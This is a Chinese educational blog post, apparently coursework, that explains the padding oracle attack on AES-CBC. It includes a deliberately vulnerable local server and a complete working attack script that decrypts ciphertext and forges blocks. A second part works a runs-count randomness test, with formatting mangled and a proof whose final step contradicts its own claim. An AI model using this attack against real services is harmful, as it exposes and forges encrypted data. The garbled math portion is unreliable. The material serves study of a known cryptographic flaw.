Padding Oracle攻击解密AES

Posted poziiey

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Padding Oracle攻击解密AES相关的知识,希望对你有一定的参考价值。

1-Problem 2 (验证 Padding Oracle 攻击算法)

①Padding Oracle攻击原理介绍

  • Padding Oracle的基础

    攻击针对的是CBC模式。CBC模式即在分组加密的过程中,前一组的加密结果将会影响到下一次加密,形成迭代,加强加密算法的敏感性。其中最重要的就是这个IV,初始化向量IV与第一组明文XOR之后,经过运算得到新的IV,用于下一分组。

技术图片

  • Padding Oracle 攻击的条件:

    1、攻击者能够获得密文(ciphertext),以及密文对应的IV(初始化向量)

    2、攻击者能够触发密文的解密过程,且能够知道密文的解密结果(因为需要根据结果不断尝试。

  • Padding Oracle 攻击的步骤:

    核心:通过穷举IV来爆破得到中间值(错误的IV会得到错误的padding,而如果不符合padding规则,程序会报错)

    1、初始化一个IV位 [‘x00‘] * 16,即16个x00

    2、服务端在解密的时候由于padding 不符合规则而导致报错

    3、接着,我们就可以将IV依次增大,去试探,直到不出现报错信息,则表示我们的padding正确,因为整个异或流程中,Intermediary Value是固定不变的,所以我们最多尝试0xFF次,就肯定能令最后的Padding为0x01

    4、通过上一步,可以得到初始向量的最后一位,和确定的Padding最后一位0x01,那么我们就能推导出中间值的最后一位。

    5、接着,我们就可以碰撞Padding最后两位是0x02 0x02的情况,来得到中间值的最后第二位

    6、以此类推,得到所有的中间值

Tips:Intermediary Value(中间值)是指最后一个分组的解密结果

  • Padding Oracle的时间复杂度

    Padding Oracle攻击并没有破解掉加密算法的密钥,也没有能力对任意密文做逆向解密,只是可以利用一个有效密文,生成一个解密后得到任意指定内容明文的伪造密文。在时间复杂度上,以一个8byte的IV构造为例,每个Byte最坏的情况需要尝试256次,总共是2048次。

②Padding Oracle攻击代码实现

由于AES加解密代码过于复杂,有些步骤原理好懂,但是用代码实现起来却很麻烦。故直接使用python提供的第三方库Crypto进行加密,此处只进行加解密的测试。

  • 项目框架

为了便于测试,使用了flask这个轻量级web应用框架。将加解密平台一直挂在后端。其中.flaskenv为运行flask server的文件;app.py挂起加解密web端;test_request.py用于测试加解密,并以此说明本次攻击的原理;attack.py用于攻击。

技术图片

  • 程序运行

1、打开terminal启动flask server【命令:flask run】
.flaskenv文件内容为FLASK_APP = "app.py"

技术图片

此时打开浏览器输入192.168.0.6:8081/发现成功挂起

技术图片

2、测试加解密结果,说明此次攻击的原理。【运行test_request.py】

技术图片

我们对zhangtuoning进行加密,结果为CbO!3t3lzMDDcBGbTl5M9DaHVGjR8iT2Qi-Cr-BJaAM~
记下这串字符串,我们再来对其解密

技术图片

发现解密结果正确,为zhangtuoning

此时我们修改密文中的一个字符

技术图片

抛出异常padding value error,与我们前面说的原理一致,能够知道解密的结果是否正确错误,是我们攻击的必要条件之一。

3、实现Padding Oracle攻击。【运行attack.py】

技术图片

首先得到ilovecryptography的加密结果(图中框线位置),再对其进行攻击。可以看到通过/check请求,成功解密出明文, 即results[0]。 results[1]是每个数据分组的中间状态,即我们前面讲过的中间值。

4、修改attack.py,改变初始变量IV,即改变第一个分组的解密结果。
增加函数如下

技术图片

运行结果

技术图片

fake data!!完美!!

  • 代码展示【工程文件见附件】
#!/usr/bin/python
# coding=utf-8
# python 3
#app.py用于启动flask server挂起web端

from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs, unquote
import traceback
import base64
from Crypto import Random
from Crypto.Cipher import AES

# padding 对齐的字节数
BS = 16

def pad(s):
    return s + (BS - len(s) % BS) * chr(BS - len(s) % BS)

def unpad(s):
    '''检查解密串的padding是否正确,并去掉Padding'''
    pad = s[-1]
    # padding值不对就抛出异常,网上的python实现基本都忽略了padding值检查
    if pad > BS or pad < 1:
        # padding值大于0小于等于最大分组字节数
        raise Exception("padding error.")
    slen = len(s)
    for p in s[slen-pad:slen]:
        # 所有padding值相等
        if p != pad:
            raise Exception("padding value error.")
    print("unpad:", pad)
    return s[0:-pad]

class AESCipher:
    """ AES cbc 加解密
    """
    def __init__(self, key):
        self.key = key.encode('utf-8')

    def encrypt(self, raw):
        raw = pad(raw).encode('utf-8')
        iv = Random.new().read(AES.block_size)
        c = AES.new(self.key, AES.MODE_CBC, iv)
        return str(base64.b64encode(iv + c.encrypt(raw)), 'utf-8')

    def decrypt(self, enc):
        enc = base64.b64decode(enc)
        iv = enc[:16]
        c = AES.new(self.key, AES.MODE_CBC, iv)
        deced = unpad(c.decrypt(enc[16:]))
        return deced

cipher = AESCipher('1234567890123456')
# cipher.encrypt('testaa')

form = '''<!DOCTYPE html>
<title>aes encoder/decoder</title>
<form method="POST" action="/encode">
<textarea name="body"></textarea>
<br>
<button type="submit">加密</button>
</form>'''

PORT_NUMBER = 8081

def b64_url_dec(s):
    return s.replace('~', '=').replace('!', '/').replace('-', '+')

def b64_url_enc(s):
    return s.replace('+', '-').replace('/', '!').replace('=', '~')

class myHandler(BaseHTTPRequestHandler):
    # Handler for the GET requests
    def write_out(self, data):
        self.send_response(200)
        self.send_header('Content-type', 'text/html; charset=utf-8')
        self.end_headers()
        self.wfile.write(data)

    def do_GET(self):
        if "/decode" in self.path:
            try:
                # 解密操作
                query = urlparse(self.path).query
                print('decode query:', query)
                query_components = dict(qc.split("=")
                                        for qc in query.split("&"))
                data = b64_url_dec(unquote(query_components["data"]))
                deced = cipher.decrypt(data)
                self.write_out(deced)
            except:
                self.write_out(traceback.format_exc().encode())
        elif "/check" in self.path:
            try:
                # 检查是否能正确解密
                query = urlparse(self.path).query
                print('check query:', query)
                query_components = dict(qc.split("=")
                                        for qc in query.split("&"))
                data = b64_url_dec(unquote(query_components["data"]))
                deced = cipher.decrypt(data)
                self.write_out(u'成功通过!'.encode('utf-8'))
            except:
                self.write_out(traceback.format_exc().encode())
        else:
            self.write_out(form.encode())

    def do_POST(self):
        print("post:", self.path)
        if self.path == "/encode":
            # 加密操作
            try:
                content_len = int(self.headers.get('Content-Length'))
                post_body = self.rfile.read(content_len)
                postvars = parse_qs(post_body, keep_blank_values=1)
                print('post encode vars:', postvars)
                body = str(postvars[b'body'][0], 'utf-8')
                enced = cipher.encrypt(body)
                out = b64_url_enc(enced)
                self.write_out(out.encode())
            except:
                self.write_out(traceback.format_exc().encode())

try:
    # Create a web server and define the handler to manage the
    # incoming request
    server = HTTPServer(('', PORT_NUMBER), myHandler)
    print('Started httpserver on port ', PORT_NUMBER)
    # Wait forever for incoming htto requests
    server.serve_forever()

except KeyboardInterrupt:
    print('^C received, shutting down the web server')
    server.socket.close()
# coding=utf-8
# python 3
# attack.py padding oracle 实现代码

from Crypto import Random
import requests as req
import re
import base64

# 分组最大字节数
BS = 16

proxy = 'http://127.0.0.1:8080'
MY_PROXY = {
    # 本地代理,用于测试,如果不需要代理可以注释掉
    #'http': proxy,
    #'https': proxy,
}

host = 'http://192.168.0.6:8081'

def pad(s):
    return s + (BS - len(s) % BS) * chr(BS - len(s) % BS)

def unpad(s):
    return s[0:-s[-1]]

def find_valid_byte(req_fn, find_valid_fn, data, pos, min_req):
    data = bytearray(data)
    results = {}
    for i in range(0x100):
        # 检测从0到255的值是否符合padding要求
        data[pos] = i
        results[i] = req_fn(bytes(data))
        if i >= min_req:
            r_data = find_valid_fn(results)
            if r_data:
                return r_data
    return find_valid_fn(results)

def format_padding_iv(iv, pos, value):
    r = bytearray(iv)
    for idx, val in enumerate(r):
        if idx > pos:
            r[idx] = val ^ value
        else:
            r[idx] = val
    return bytes(r)

def padding_oracle_group(req_fn, find_valid_fn, data, orig_iv, i_state=b'', min_req=256):
    count = BS - len(i_state)
    iv = bytearray(Random.new().read(count) + i_state)
    r_istate = bytearray(i_state)
    for pos in reversed(range(count)):
        print("pos:%d iv:%s istate:%s" % (pos, iv, r_istate))
        pad_v = BS - pos
        curr_data = format_padding_iv(iv, pos, pad_v) + data
        print('pad_v:', pad_v, ' test data:', curr_data)
        val = find_valid_byte(req_fn, find_valid_fn, curr_data, pos, min_req)
        if val:
            r = val ^ pad_v
            print("find istate %02x at pos:%d" % (r, pos))
            iv[pos] = r
            r_istate.insert(0, r)
        else:
            print("can't find istate at pos:", pos)
            return None, r_istate
    deced_res = bytes(a ^ b for (a, b) in zip(orig_iv, r_istate))
    return deced_res, r_istate

def partition_group(data):
    '''data按分组长度进行分组'''
    return [data[i:i+BS] for i in range(0, len(data), BS)]

def padding_oracle(req_fn, find_valid_fn, data, min_req=256):
    parts = partition_group(data)
    ivs = parts[:-1]
    datas = parts[1:]
    result = b''
    istates = []
    for group_iv, group_data in zip(ivs, datas):
        group_result, group_istate = padding_oracle_group(
            req_fn, find_valid_fn, group_data, group_iv, min_req=min_req)
        result += group_result
        istates.append(group_istate)
    return result, istates

def test_enc(txt):
    '''测试加密'''
    resp = req.post(host + '/encode', data={'body': txt}, proxies=MY_PROXY)
    return resp.text

def test_dec(txt):
    '''测试解密'''
    resp = req.get(host + '/decode', params={'data': txt}, proxies=MY_PROXY)
    return resp.text

def test_check(txt):
    '''测试检查'''
    resp = req.get(host + '/check', params={'data': txt}, proxies=MY_PROXY)
    return resp.text

def b64_url_dec(s):
    return s.replace('~', '=').replace('!', '/').replace('-', '+')

def b64_url_enc(s):
    return s.replace('+', '-').replace('/', '!').replace('=', '~')

def bytes_to_str(data):
    return "".join(chr(x) for x in bytearray(data))

def my_dec_req(data):
    '''测试解密,注意这里的data是原始字节'''
    txt = b64_url_enc(bytes_to_str(base64.b64encode(data)))
    return test_check(txt)

def my_check_ok(resps):
    '''检测并返回解密成功的值'''
    for value, resp in resps.items():
        if re.match(r'成功', resp):
            return value
    return None

def build_fake_first(data, fake_data, data_is):
    ''' data为密文数据
    fake_data 伪造的第一个分组数据
    data_is 解密出的中间状态值'''
    if len(fake_data) > BS:
        raise Exception('fake data too large!')
    new_data = bytearray(data)
    fake_group_data = pad(fake_data)
    for i in range(BS):
        new_data[i] = ord(fake_group_data[i]) ^ data_is[i]
    return new_data

# 获取一个加密数据
test1 = test_enc('ilovecryptography')
test_data = base64.b64decode(b64_url_dec(test1))

# 这里使用min_req选项,能显著加快运行速度
results = padding_oracle(my_dec_req, my_check_ok, test_data, min_req=10)
print(results)

my_fake = build_fake_first(test_data, 'fake data', results[1][0])
print(test_dec(b64_url_enc(bytes_to_str(base64.b64encode(my_fake)))))

2-Problem 3 (变化点个数的概率分布)

(是ε = ε_1ε_2···ε_{n+1} 是 i.i.d.), 定义 $ χ(ε_i) = ε_i⊕ε_{i+1} $ , 即 $ χ(ε_i) = 1 $表示在第 $i $位置的 $ ε_i $, 和后一 位的 $ε_{i+1} $之间发生了比特翻转. 设 $ ξ = sum_{i=1}^{n}{χ(ε_i)} $ 。

1、 $ ξ $ 是什么分布

2、 (ε=11001001000011111101101010100010001000010110100011 00001000110100110001001100011001100010100010111000) , 计算观察值和 P 值(借助 refc 函数的程序)。

3、取$ α = 0.01(, 拒绝还是接受“)是ε 是 i.i.d.$ 样本”?

  • $ ξ $ 是正态分布

  • char k0;
    char k1;
    int num = 0;
    char s[] = " 1100100100001111110110101010001000100001011010001100001000110100110001001100011001100010100010111000";
    
    for(int i=0;i<99;i++){
        k0 = s[i];
        k1 = s[i+1];
        if(k0!=k1){
            num++;
        }
    }
    
    printf("%d
    ",num);

    上述代码中的num值即为要求的 $ ξ $ ,可得 $ ξ $ =51。又容易得n=100。

    则观察值 (η = frac{ξ-n/2}{ sqrt{n/4} } =0.2)

    利用matlab中erfc可得P值为(0.8415)

    技术图片

  • 由第二问可得P值大于(α)值,则接受“(是ε 是 i.i.d.) 样本”。


2-Problem 3 (变化点个数的概率分布)

设 $Φ(x) = frac{1}{ sqrt{2π}} int_{-∞}^{x}{e^{-t^2/2}}dt (是标准正态分布的分布函数,定义余差函数) refc(z) = frac{2}{sqrt{π}}int_{z}^{∞}{e^{-u^2}}du$.

证明$ P(|x| > |c|) = refc( frac{c}{sqrt{2}} )$。

技术图片

  • 其B部分总面积由积分函数 $ frac{1}{sqrt{2pi}}int_{-infty}^{-c}{e^{-t^2/2}}dt + frac{1}{sqrt{2pi}}int_{c}^{infty}{e^{-t^2/2}}dt$得到,而由正态分布的性质可得B部分左右两边面积相等,

    而余差函数 $ refc(z) = frac{2}{sqrt{pi}}int_{z}^{infty}{e^{-u^2}}du $,令 $z= frac{c}{sqrt{2}} $,余差函数为 $ refc(frac{c}{sqrt{2}}) = frac{2}{sqrt{2pi}}int_{c}^{infty}{e^{-u^2/2}}du $

    即可得$S= frac{1}{2} refc(frac{c}{sqrt{2}}) $ ,即 $ P(|x| > |c|) = frac{1}{2}refc(frac{c}{sqrt{2}}) $,即得证。

以上是关于Padding Oracle攻击解密AES的主要内容,如果未能解决你的问题,请参考以下文章

iOS 中的 AES 解密:PKCS5 padding 和 CBC

Java实现AES/CBC/PKCS7Padding加解密

AES/ECB/PKCS5Padding加解密

Java笔记-AES加解密(PKCS7padding可用)

java实现AES/CBC/pack5padding加解密算法

Java AES / ECB / PKCS5Padding加密到crypto-js解密